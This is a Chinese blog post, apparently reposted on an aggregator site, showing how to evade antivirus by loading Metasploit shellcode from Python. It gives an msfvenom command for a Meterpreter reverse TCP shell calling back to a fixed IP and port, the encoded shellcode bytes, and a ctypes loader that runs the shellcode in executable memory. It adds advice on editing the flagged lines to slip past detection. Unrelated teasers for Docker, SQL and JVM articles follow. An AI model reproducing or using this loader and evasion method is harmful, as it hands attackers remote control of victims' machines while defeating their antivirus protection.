python 生成payload_利用Python进行Payload分离免杀

缺点:

编译成exe以后体积过大

实现:

msf生成shellcode代码:

msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 LHOST=192.168.3.60 LPORT=3333 -f c

27176982d9b17e5d042a960d9629633c.png

将payload给copy下来,去除引号。

\x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42

\x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33

\x49\x6f\x44\x37\x64\x4b\x4a\x6a\x48\x2f\x72\x44\x78\x68\x66

\x41\x49\x73\x49\x4d\x48\x50\x44\x51\x48\x48\x34\x76\x4a\x53

\x56\x34\x74\x53\x45\x49\x74\x4b\x50\x49\x74\x4d\x45\x58\x6a

\x6a\x53\x41\x48\x52\x55\x59\x74\x5a\x49\x41\x48\x54\x69\x30

\x6b\x59\x34\x7a\x70\x4a\x69\x7a\x53\x4c\x41\x64\x59\x78\x2f

\x36\x7a\x42\x7a\x77\x30\x42\x78\x7a\x6a\x67\x64\x66\x59\x44

\x66\x66\x67\x37\x66\x53\x52\x31\x35\x46\x69\x4c\x57\x43\x51

\x42\x30\x32\x61\x4c\x44\x45\x75\x4c\x57\x42\x77\x42\x30\x34

\x73\x45\x69\x77\x48\x51\x69\x55\x51\x6b\x4a\x46\x74\x62\x59

\x56\x6c\x61\x55\x66\x2f\x67\x58\x31\x39\x61\x69\x78\x4c\x72

\x6a\x56\x31\x6f\x4d\x7a\x49\x41\x41\x47\x68\x33\x63\x7a\x4a

\x66\x56\x47\x68\x4d\x64\x79\x59\x48\x69\x65\x6a\x2f\x30\x4c

\x69\x51\x41\x51\x41\x41\x4b\x63\x52\x55\x55\x47\x67\x70\x67

\x47\x73\x41\x2f\x39\x56\x71\x43\x6d\x6a\x41\x71\x41\x4d\x38

\x61\x41\x49\x41\x44\x51\x57\x4a\x35\x6c\x42\x51\x55\x46\x42

\x41\x55\x45\x42\x51\x61\x4f\x6f\x50\x33\x2b\x44\x2f\x31\x5a

\x64\x71\x45\x46\x5a\x58\x61\x4a\x6d\x6c\x64\x47\x48\x2f\x31

\x59\x58\x41\x64\x41\x72\x2f\x54\x67\x68\x31\x37\x4f\x68\x6e

\x41\x41\x41\x41\x61\x67\x42\x71\x42\x46\x5a\x58\x61\x41\x4c

\x5a\x79\x46\x2f\x2f\x31\x59\x50\x34\x41\x48\x34\x32\x69\x7a

\x5a\x71\x51\x47\x67\x41\x45\x41\x41\x41\x56\x6d\x6f\x41\x61

\x46\x69\x6b\x55\x2b\x58\x2f\x31\x5a\x4e\x54\x61\x67\x42\x57

\x55\x31\x64\x6f\x41\x74\x6e\x49\x58\x2f\x2f\x56\x67\x2f\x67

\x41\x66\x53\x68\x59\x61\x41\x42\x41\x41\x41\x42\x71\x41\x46

\x42\x6f\x43\x79\x38\x50\x4d\x50\x2f\x56\x56\x32\x68\x31\x62

\x6b\x31\x68\x2f\x39\x56\x65\x58\x76\x38\x4d\x4a\x41\x2b\x46

\x63\x50\x2f\x2f\x2f\x2b\x6d\x62\x2f\x2f\x2f\x2f\x41\x63\x4d

\x70\x78\x6e\x58\x42\x77\x37\x76\x77\x74\x61\x4a\x57\x61\x67

\x42\x54\x2f\x39\x55\x3d

将自己的代码放入第3行的shell_code位置。

import ctypes,base64

encode_shellcode = "shell_code"

shellcode = base64.b64decode(encode_shellcode)

rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)

ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))

handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)

ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

以上代码是绝对会被查杀的,但是可以通过修改代码绕过。思路如下,先查找杀软查杀哪里,再修改杀软查杀的代码,同时保证正常运行。提示一下,查杀的代码再5-6行之间,对其进行修改即可。

返回session:

03568202d7ad95cbb9966aeb83131a3c.png

免杀效果:

d243d6cf4fab53c1225fbd4575cad49d.png

参考资料:

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/271259.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

ping不通docker_初识docker

ping不通docker_初识docker

前言大家好,我是jack xu,本篇是我在今日头条的首秀,我的英文名来源于jack ma,马云,所以大家也可以叫我徐云,即我希望像马云一样富有、成功,另外我名字中的杰与jack也是谐音关系。今天给大家带来…
阅读更多...
SQL语言基础:数据库语言概念介绍

SQL语言基础:数据库语言概念介绍

1、概念介绍SQL(Structured Query Lanauage)结构化查询语言是关系数据库中最普遍使用的语言。主要包括查询、数据操纵、数据定义、数据控制功能,是一种通用的、功能强大的关系数据库的标准语言。2、SQL语言分类2.1 数据库定义语言&#xff08…
阅读更多...
configuration 命名空间_kubernetes30:monitoring命名空间处于Terminating状态的处理方法...

configuration 命名空间_kubernetes30:monitoring命名空间处于Terminating状态的处理方法...

删除monitoring命名空间时总也无法彻底删除,发现monitoring处于Terminating状态,故有此文。kubectl get namespaces -o wide解决:尝试使用force delete。kubectl delete namespace monitoring --force --grace-period0发现强制删除没有成功。…
阅读更多...
SQL语言基础:SQL语言概念知识笔记

SQL语言基础:SQL语言概念知识笔记

1、SQL标准ANSI(美国国家标准机构)SQL对ANSI SQL进行修改后在1992年采用的标准SQL-92或SQL2SQL-99或SQL3标准从SQL2扩充而来,增加了对象关系特征和许多其他新的功能。最近的标准版本是SQL:20032、SQL的特点综合统一:SQ…
阅读更多...
原型(Prototype)的场景是不支持循环依赖的

原型(Prototype)的场景是不支持循环依赖的

原型(Prototype)的场景是不支持循环依赖的,通常会走到AbstractBeanFactory类中下面的判断,抛出异常。
阅读更多...
网络工程中,VLAN到底有什么作用?

网络工程中,VLAN到底有什么作用?

什么是VLAN呢?VLAN(Virtual Local Area Network)即虚拟局域网,是将一个物理的LAN在逻辑上划分成多个广播域的通信技术。在IEEE802.1Internetworking委员会结束了对VLAN初期标准的修订工作的时候。新出台的标准进一步完善了VLAN的体…
阅读更多...
hrjava项目原型html_Mockplus for Mac(原型设计工具)

hrjava项目原型html_Mockplus for Mac(原型设计工具)

Mockplus for Mac是Mac平台上一款简单、快速的原型设计工具,无需任何编程,不需要任何编程基础知识,帮你快速使用Mockplus设计图形。Mockplus封装了近200个组件,提供3000个以上的图标素材。做图时,只需要把这些组件放入…
阅读更多...
Leetcode 给定一个数组,给定一个数字。返回数组中可以相加得到指定数字的两个索引

Leetcode 给定一个数组,给定一个数字。返回数组中可以相加得到指定数字的两个索引

问题内容是:给定一个数组,给定一个数字。返回数组中可以相加得到指定数字的两个索引。 比如:给定nums [2, 7, 11, 15], target 9 那么要返回 [0, 1],因为2 7 9 这道题的优解是,一次遍历HashMap: 先去…
阅读更多...
SQL语言基础:常用的数据查询语句

SQL语言基础:常用的数据查询语句

1、创建表语法格式&#xff1a;creat table <表名> (<,列名><数据类型>[列级完整性约束条件]<,列名><数据类型>[列级完整性约束条件]...[,<表级完整性约束条件>]);列级完整性约束条件&#xff1a;主键、外键 、唯一 unique、检查 、默认值…
阅读更多...
两个不同网段的局域网如何互通_不同网段之间如何通信?

两个不同网段的局域网如何互通_不同网段之间如何通信?

计算机之前是如何实现互相通信的呢&#xff1f;正文首先&#xff0c;计算机之间通信人为设定一个准则&#xff0c;这个准则是什么呢&#xff1f;如果两台计算机在一个相同网段&#xff0c;不需要辅助设备(网关)的帮助&#xff0c;可以直接通信。如果两台计算机在不同网段&#…
阅读更多...
SpringCloud Gateway的组成结构

SpringCloud Gateway的组成结构

SpringCloud Gateway结构 SpringCloud Gateway的底层基于Netty&#xff0c;主要组成有Predicates&#xff08;谓词或者断言&#xff09;、Route&#xff08;路由&#xff09;、Filter&#xff08;过滤器&#xff09; 思维导图----------SpringCloud Gateway的组成&#xff1a; …
阅读更多...
java resource放入的文件没有生成在classes中_快速部署版@开源在线考试系统一键生成各种题型试卷且实时判卷...

java resource放入的文件没有生成在classes中_快速部署版@开源在线考试系统一键生成各种题型试卷且实时判卷...

首先声明此项目来自开源网&#xff0c;小编也是爱好者&#xff1b;阅读本文之前相信已经阅读过【开源在线考试系统一键生成各种题型试卷且可以实时判卷】开源在线考试系统一键生成各种题型试卷且可以实时判卷本文分享快速部署版jar包&#xff0c;原项目前后台是单独项目&#x…
阅读更多...
SQL语言基础:SQL中的数据完整性约束用法

SQL语言基础:SQL中的数据完整性约束用法

前言数据库的完整性是指数据库正确性和相容性&#xff0c;是防止合法用户使用数据库时向数据库加入不符合语义的数据&#xff0c;从而保证了数据库中的数据是正确的&#xff0c;避免非法的更新操作。1、主键约束1.1 完整性约束条件完整性约束条件作用的对象有关系、元组、列三种…
阅读更多...
SpringCloud Gateway的工作方式

SpringCloud Gateway的工作方式

SpringCloud Gateway工作方式 从官网的图来看&#xff0c;并不是特别复杂&#xff0c;首先客户端请求都会先经过Gateway Handler Mapping&#xff0c;匹配上就通过Gateway Web Handler转给过滤器处理&#xff0c;过滤器分为PreFilter&#xff08;前置过滤器&#xff09;、PostF…
阅读更多...
后端:414 Request-URI Too Large解决方案

后端:414 Request-URI Too Large解决方案

目录 一、get请求改为Post请求 二、调整前端请求参数的逻辑 三、服务器配置调整 3.1 Java项目 3.2 PHP项目&#xff1a; 3.3 Net项目 3.4 nginx配置文件修改内容&#xff1a; Web项目接口请求会出现414 Request-URI Too Large这个错误 下面给大家分享一下相关解决办法&#xf…
阅读更多...
面向对象和面向过程_程序员给你解释:面向对象和面向过程的区别,到底是怎么回事?...

面向对象和面向过程_程序员给你解释:面向对象和面向过程的区别,到底是怎么回事?...

今天下午在一个组的项目回顾会议上&#xff0c;这个同事讲了自己用DDD思想对三个模块的重构。把之前在Service层的一些业务逻辑下沉到了领域层里&#xff0c;由之而引起的讨论。部门经理&#xff1a;“其实你的业务逻辑总体并没有少&#xff0c;只是把边界重新划分了一下。”一…
阅读更多...
SQL语言基础:SQL授权相关知识笔记​

SQL语言基础:SQL授权相关知识笔记​

1、数据控制数据控制是控制对用户存取的权力&#xff0c;由DBA来决定。DBMS数据控制与功能&#xff1a;1、通过GRANT和REVOKE将授权通知系统&#xff0c;并存入数据字典。2、当用户发起请求时&#xff0c;根据授权情况检查是否执行操作请求。SQL标准包括 delete、insert、selec…
阅读更多...
JVM的位置

JVM的位置

对于JVM的位置&#xff1a; JVM是运行在操作系统之上的,它与硬件没有直接的交互JVM是运行在操作系统之上的&#xff0c;与硬件没有直接的交互&#xff0c;但是可以调用底层的硬件&#xff0c;用JIN &#xff08;Java本地接口调用底层硬件接口&#xff0c;了解下就好&#xff0…
阅读更多...
word2010添加b5纸张大小_纸张幅面规格尺寸你了解吗?

word2010添加b5纸张大小_纸张幅面规格尺寸你了解吗?

点击蓝色文字关注|十七的锚|(单位&#xff1a;mm)关于印前调整若纸张规格标记字母的前面加一个字母R(或S)时&#xff0c;是表示纸张没有切毛边&#xff0c;经过切边修整后&#xff0c;将减少到标准尺寸&#xff0c;例如RA4(或SA4)表示不切边纸张的尺寸为240mm*330mm&#xff0c…
阅读更多...
JVM体系结构

JVM体系结构

JVM体系结构 Java虚拟机主要分为五大模块&#xff1a; 类装载器子系统运行时数据区执行引擎本地方法接口垃圾收集模块1、JVM一共分为五个区&#xff0c;分别为方法区、堆、Java栈、本地方法栈、程序计 2、方法区、堆为线程共享区域&#xff0c;GC会对二个区进行垃圾回收&…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023